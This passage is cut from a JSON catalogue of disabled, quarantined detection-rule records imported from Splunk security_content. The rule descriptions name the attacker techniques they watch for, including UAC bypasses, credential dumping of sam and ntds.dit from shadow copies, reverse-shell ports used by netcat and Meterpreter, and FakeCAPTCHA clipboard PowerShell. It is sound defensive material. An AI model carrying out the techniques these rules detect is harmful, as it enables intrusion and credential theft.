If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-4104-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6f2b006-0041-11ec-8885-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_4104_hunting.yml" } }, { "id": "splunk-security-content-d71efbf6-da63-11eb-8c6e-acde48001122", "type": "detection", "name": "Sdclt UAC Bypass", "description": "The following analytic detects suspicious modifications to the sdclt.exe registry, a technique often used to bypass User Account Control (UAC). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific registry paths and values associated with sdclt.exe. This activity is significant because UAC bypasses can allow attackers to execute payloads with elevated privileges without user consent. 
If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, and potential persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sdclt-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d71efbf6-da63-11eb-8c6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sdclt_uac_bypass.yml" } }, { "id": "splunk-security-content-d7297cfa-1f04-4714-bfbe-3679e0666959", "type": "detection", "name": "Windows Office Product Loading Taskschd DLL", "description": "The following analytic detects an Office document creating a scheduled task, either through a macro VBA API or by loading `taskschd.dll`. This detection leverages Sysmon EventCode 7 to identify when Office applications load the `taskschd.dll` file. This activity is significant as it is a common technique used by malicious macro malware to establish persistence or initiate beaconing. 
If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, or schedule future malicious activities, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loading-taskschd-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7297cfa-1f04-4714-bfbe-3679e0666959", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loading_taskschd_dll.yml" } }, { "id": "splunk-security-content-d7369bf5-1315-4138-b927-2dd8bb8c1da7", "type": "detection", "name": "Windows Handle Duplication in Known UAC-Bypass Binaries", "description": "The following analytic detects suspicious handle duplication activity targeting known Windows utilities such as ComputerDefaults.exe, Eventvwr.exe, and others. This technique is commonly used to escalate privileges or bypass UAC by inheriting or injecting elevated tokens or handles. The detection focuses on non-standard use of DuplicateHandle or token duplication where process, thread, or token handles are copied into the context of trusted, signed utilities. Such behavior may indicate attempts to execute with elevated rights without user consent. 
Alerts enable rapid triage using process trees, handle data, token attributes, command-lines, and binary hashes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-handle-duplication-in-known-uac-bypass-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7369bf5-1315-4138-b927-2dd8bb8c1da7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_handle_duplication_in_known_uac_bypass_binaries.yml" } }, { "id": "splunk-security-content-d77d349e-6269-11ec-9cfe-acde48001122", "type": "detection", "name": "Suspicious Ticket Granting Ticket Request", "description": "The following analytic detects suspicious Kerberos Ticket Granting Ticket (TGT) requests that may indicate exploitation of CVE-2021-42278 and CVE-2021-42287. It leverages Event ID 4781 (account name change) and Event ID 4768 (TGT request) to identify sequences where a newly renamed computer account requests a TGT. This behavior is significant as it could represent an attempt to escalate privileges by impersonating a Domain Controller. 
If confirmed malicious, this activity could allow attackers to gain elevated access and potentially control over the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-ticket-granting-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d77d349e-6269-11ec-9cfe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_ticket_granting_ticket_request.yml" } }, { "id": "splunk-security-content-d7c2c09b-9569-4a9e-a8b6-6a39a99c1d32", "type": "detection", "name": "Windows ISO LNK File Creation", "description": "The following analytic detects the creation of .iso.lnk files in the %USER%\\AppData\\Local\\Temp\\\\ path, indicating that an ISO file has been mounted and accessed. This detection leverages the Endpoint.Filesystem data model, specifically monitoring file creation events in the Windows Recent folder. This activity is significant as it may indicate the delivery and execution of potentially malicious payloads via ISO files. 
If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.001", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iso-lnk-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7c2c09b-9569-4a9e-a8b6-6a39a99c1d32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iso_lnk_file_creation.yml" } }, { "id": "splunk-security-content-d7c6ad22-155c-11ec-bb64-acde48001122", "type": "detection", "name": "Powershell Get LocalGroup Discovery with Script Block Logging", "description": "The following analytic detects the execution of the PowerShell cmdlet `get-localgroup` using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into script execution. Monitoring this activity is significant as it can indicate an attempt to enumerate local groups, which may be a precursor to privilege escalation or lateral movement. If confirmed malicious, an attacker could gain insights into group memberships, potentially leading to unauthorized access or privilege abuse. 
Review parallel processes and the entire script block for comprehensive analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-get-localgroup-discovery-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7c6ad22-155c-11ec-bb64-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_get_localgroup_discovery_with_script_block_logging.yml" } }, { "id": "splunk-security-content-d7ceffc5-a45e-412b-b9fa-2ba27c284503", "type": "detection", "name": "Local LLM Framework DNS Query", "description": "Detects DNS queries related to local LLM models on endpoints by monitoring Sysmon DNS query events (Event ID 22) for known LLM model domains and services.\nLocal LLM frameworks like Ollama, LM Studio, and GPT4All make DNS calls to repositories such as huggingface.co and ollama.ai for model downloads, updates, and telemetry.\nThese queries can reveal unauthorized AI tool usage or data exfiltration risks on corporate networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/local-llm-framework-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7ceffc5-a45e-412b-b9fa-2ba27c284503", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/local_llm_framework_dns_query.yml" } }, { "id": "splunk-security-content-d7d1795b-ea18-47e5-9ca6-2c330d052d21", "type": "detection", "name": "Windows Audit Policy Restored via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/restore\" command-line argument used to restore the audit policy from a file. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. Attackers can provide an audit policy file that disables certain or all audit policy configuration. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-restored-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7d1795b-ea18-47e5-9ca6-2c330d052d21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_restored_via_auditpol.yml" } }, { "id": "splunk-security-content-d7fc865e-b8a1-4029-a960-cf4403b821b6", "type": "detection", "name": "Kubernetes Node Port Creation", "description": "The following analytic detects the creation of a Kubernetes NodePort service, which exposes a service to the external network. It identifies this activity by monitoring Kubernetes Audit logs for the creation of NodePort services. This behavior is significant for a SOC as it could allow an attacker to access internal services, posing a threat to the Kubernetes infrastructure's integrity and security. 
If confirmed malicious, this activity could lead to data breaches, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-node-port-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7fc865e-b8a1-4029-a960-cf4403b821b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_node_port_creation.yml" } }, { "id": "splunk-security-content-d8120352-3b62-411c-8cb6-7b47584dd5e8", "type": "detection", "name": "Suspicious Process Executed From Container File", "description": "The following analytic identifies a suspicious process executed from within common container/archive file types such as ZIP, ISO, IMG, and others. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it is a common technique used by adversaries to execute scripts or evade defenses. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-executed-from-container-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8120352-3b62-411c-8cb6-7b47584dd5e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_process_executed_from_container_file.yml" } }, { "id": "splunk-security-content-d8120352-3b62-4e3c-8cb6-7b47584dd5e8", "type": "detection", "name": "Windows Scheduled Task Service Spawned Shell", "description": "The following analytic detects when the Task Scheduler service (\"svchost.exe -k netsvcs -p -s Schedule\") spawns common command line, scripting, or shell execution binaries such as \"powershell.exe\" or \"cmd.exe\".\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships.\nThis activity is significant as attackers often abuse the Task Scheduler for execution and persistence, blending in with legitimate Windows operations.\nIf confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1053.005", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-service-spawned-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8120352-3b62-4e3c-8cb6-7b47584dd5e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_service_spawned_shell.yml" } }, { "id": "splunk-security-content-d81d4d3d-76b5-4f21-ab51-b17d5164c106", "type": "detection", "name": "Windows PowerShell FakeCAPTCHA Clipboard Execution", "description": "This detection identifies potential FakeCAPTCHA/ClickFix clipboard hijacking campaigns by looking for PowerShell execution with hidden window parameters and distinctive strings related to fake CAPTCHA verification. 
These campaigns use social engineering to trick users into pasting malicious PowerShell commands from their clipboard, typically delivering information stealers or remote access trojans.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.001", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-fakecaptcha-clipboard-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d81d4d3d-76b5-4f21-ab51-b17d5164c106", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_fakecaptcha_clipboard_execution.yml" } }, { "id": "splunk-security-content-d82d4af4-a0bd-11ec-9445-3e22fbd008af", "type": "detection", "name": "Kerberos User Enumeration", "description": "The following analytic detects an unusual number of Kerberos Ticket Granting Ticket (TGT) requests for non-existing users from a single source endpoint. It leverages Event ID 4768 and identifies anomalies using the 3-sigma statistical rule. This behavior is significant as it may indicate an adversary performing a user enumeration attack against Active Directory. 
If confirmed malicious, the attacker could validate a list of usernames, potentially leading to further attacks such as brute force or credential stuffing, compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1589.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-user-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d82d4af4-a0bd-11ec-9445-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_user_enumeration.yml" } }, { "id": "splunk-security-content-d82eced3-b1dc-42ab-859e-a2fc98827359", "type": "detection", "name": "Remote System Discovery with Wmic", "description": "The following analytic detects the execution of `wmic.exe` with specific command-line arguments used to discover remote systems within a domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to map out network resources and Active Directory structures. 
If confirmed malicious, this behavior could allow attackers to gain situational awareness, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d82eced3-b1dc-42ab-859e-a2fc98827359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-d8419343-f0f8-4d8e-91cc-18bb531df87d", "type": "detection", "name": "Windows Identify PowerShell Web Access IIS Pool", "description": "This analytic detects and analyzes PowerShell Web Access (PSWA) usage in Windows environments. It tracks both explicit-credential logon attempts (EventID 4648) and successful logons (EventID 4624) associated with PSWA, providing a comprehensive view of access patterns. The analytic identifies PSWA's operational status, host servers, processes, and connection metrics. It highlights unique target accounts, domains accessed, and verifies logon types. This information is crucial for detecting potential misuse, such as lateral movement, brute force attempts, or unusual access patterns. 
By offering insights into PSWA activity, it enables security teams to quickly assess and investigate potential security incidents involving this powerful administrative tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-identify-powershell-web-access-iis-pool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8419343-f0f8-4d8e-91cc-18bb531df87d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_identify_powershell_web_access_iis_pool.yml" } }, { "id": "splunk-security-content-d85c05c8-42c0-4e4a-87e7-4e1bb3e844e3", "type": "detection", "name": "Cisco Secure Firewall - Communication Over Suspicious Ports", "description": "The following analytic detects potential reverse shell activity by identifying connections involving ports commonly associated with remote access tools, shell listeners, or tunneling utilities. It leverages Cisco Secure Firewall Threat Defense logs and monitors destination ports against a list of non-standard, high-risk port values often used in post-exploitation scenarios. Adversaries frequently configure tools like netcat, Meterpreter, or other backdoors to listen or connect over uncommon ports such as 4444, 2222, or 51820 to bypass standard monitoring and firewall rules. Several of these ports also carry legitimate traffic (for example 2222 as an alternate SSH port and 51820 as the WireGuard default), so the port list should be tuned to the environment and a hit corroborated with process, flow, or asset context before it is treated as a reverse shell. 
If confirmed malicious, this activity may represent command and control (C2) tunneling, lateral movement, or unauthorized remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021", "T1055", "T1059.001", "T1105", "T1219", "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-communication-over-suspicious-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d85c05c8-42c0-4e4a-87e7-4e1bb3e844e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___communication_over_suspicious_ports.yml" } }, { "id": "splunk-security-content-d8b967dd-657f-4d88-93b5-c588bcd7218c", "type": "detection", "name": "Okta Risk Threshold Exceeded", "description": "The following correlation identifies when a user exceeds a risk threshold based on multiple suspicious Okta activities. It leverages the Risk Framework from Enterprise Security, aggregating risk events from \"Suspicious Okta Activity,\" \"Okta Account Takeover,\" and \"Okta MFA Exhaustion\" analytic stories. This detection is significant as it highlights potentially compromised user accounts exhibiting multiple tactics, techniques, and procedures (TTPs) within a 24-hour period. 
If confirmed malicious, this activity could indicate a serious security breach, allowing attackers to gain unauthorized access, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-risk-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8b967dd-657f-4d88-93b5-c588bcd7218c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_risk_threshold_exceeded.yml" } }, { "id": "splunk-security-content-d8bea5ca-9d4a-4249-8b56-64a619109835", "type": "detection", "name": "Windows Processes Killed By Industroyer2 Malware", "description": "The following analytic detects the termination of specific processes by the Industroyer2 malware. It leverages Sysmon EventCode 5 to identify when processes like \"PServiceControl.exe\" and \"PService_PPD.exe\" are killed. This activity is significant as it targets processes related to energy facility networks, indicating a potential attack on critical infrastructure. If confirmed malicious, this could lead to disruption of essential services, loss of control over energy systems, and significant operational impact. 
Immediate investigation is required to determine the cause and mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-processes-killed-by-industroyer2-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8bea5ca-9d4a-4249-8b56-64a619109835", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_processes_killed_by_industroyer2_malware.yml" } }, { "id": "splunk-security-content-d8c406fe-23d2-45f3-a983-1abe7b83ff3b", "type": "detection", "name": "Credential Dumping via Copy Command from Shadow Copy", "description": "The following analytic detects the use of the copy command to dump credentials from a shadow copy. It leverages Endpoint Detection and Response (EDR) data to identify processes with command lines referencing critical files like \"sam\", \"security\", \"system\", and \"ntds.dit\" in system directories. This activity is significant as it indicates an attempt to extract credentials, a common technique for unauthorized access and privilege escalation. 
If confirmed malicious, this could lead to attackers gaining sensitive login information, escalating privileges, moving laterally within the network, or accessing sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/credential-dumping-via-copy-command-from-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8c406fe-23d2-45f3-a983-1abe7b83ff3b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml" } }, { "id": "splunk-security-content-d8c972eb-ed84-431a-8869-ca4bd83257d1", "type": "detection", "name": "Windows PowerShell Get CIMInstance Remote Computer", "description": "The following analytic detects the use of the Get-CimInstance cmdlet with the -ComputerName parameter, indicating an attempt to retrieve information from a remote computer. It leverages PowerShell Script Block Logging to identify this specific command execution. This activity is significant as it may indicate unauthorized remote access or information gathering by an attacker. 
If confirmed malicious, this could allow the attacker to collect sensitive data from remote systems, potentially leading to further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-get-ciminstance-remote-computer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8c972eb-ed84-431a-8869-ca4bd83257d1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_get_ciminstance_remote_computer.yml" } }, { "id": "splunk-security-content-d8ddfa9b-b724-4df9-9dbe-f34cc0936714", "type": "detection", "name": "Windows Export Certificate", "description": "The following analytic detects the export of a certificate from the Windows Certificate Store. It leverages the Certificates Lifecycle log channel, specifically event ID 1007, to identify this activity. Monitoring certificate exports is crucial as certificates can be used for authentication to VPNs or private resources. 
If malicious actors export certificates, they could potentially gain unauthorized access to sensitive systems or data, leading to significant security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8ddfa9b-b724-4df9-9dbe-f34cc0936714", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_export_certificate.yml" } }, { "id": "splunk-security-content-d92f2d95-05fb-48a7-910f-4d3d61ab8655", "type": "detection", "name": "Windows Administrative Shares Accessed On Multiple Hosts", "description": "The following analytic detects a source computer accessing Windows administrative shares (C$, Admin$, IPC$) on 30 or more remote endpoints within a 5-minute window. It leverages Event IDs 5140 and 5145 from file share events. This behavior is significant as it may indicate an adversary enumerating network shares to locate sensitive files, a common tactic used by threat actors. 
If confirmed malicious, this activity could lead to unauthorized access to critical data, lateral movement, and potential compromise of multiple systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-administrative-shares-accessed-on-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d92f2d95-05fb-48a7-910f-4d3d61ab8655", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_administrative_shares_accessed_on_multiple_hosts.yml" } }, { "id": "splunk-security-content-d9eb7cda-5622-4722-bc88-7f2442f4b5af", "type": "detection", "name": "Windows Sensitive Group Discovery With Net", "description": "The following analytic detects the execution of `net.exe` with command-line arguments used to query elevated domain or sensitive groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to identify high-privileged users within Active Directory. 
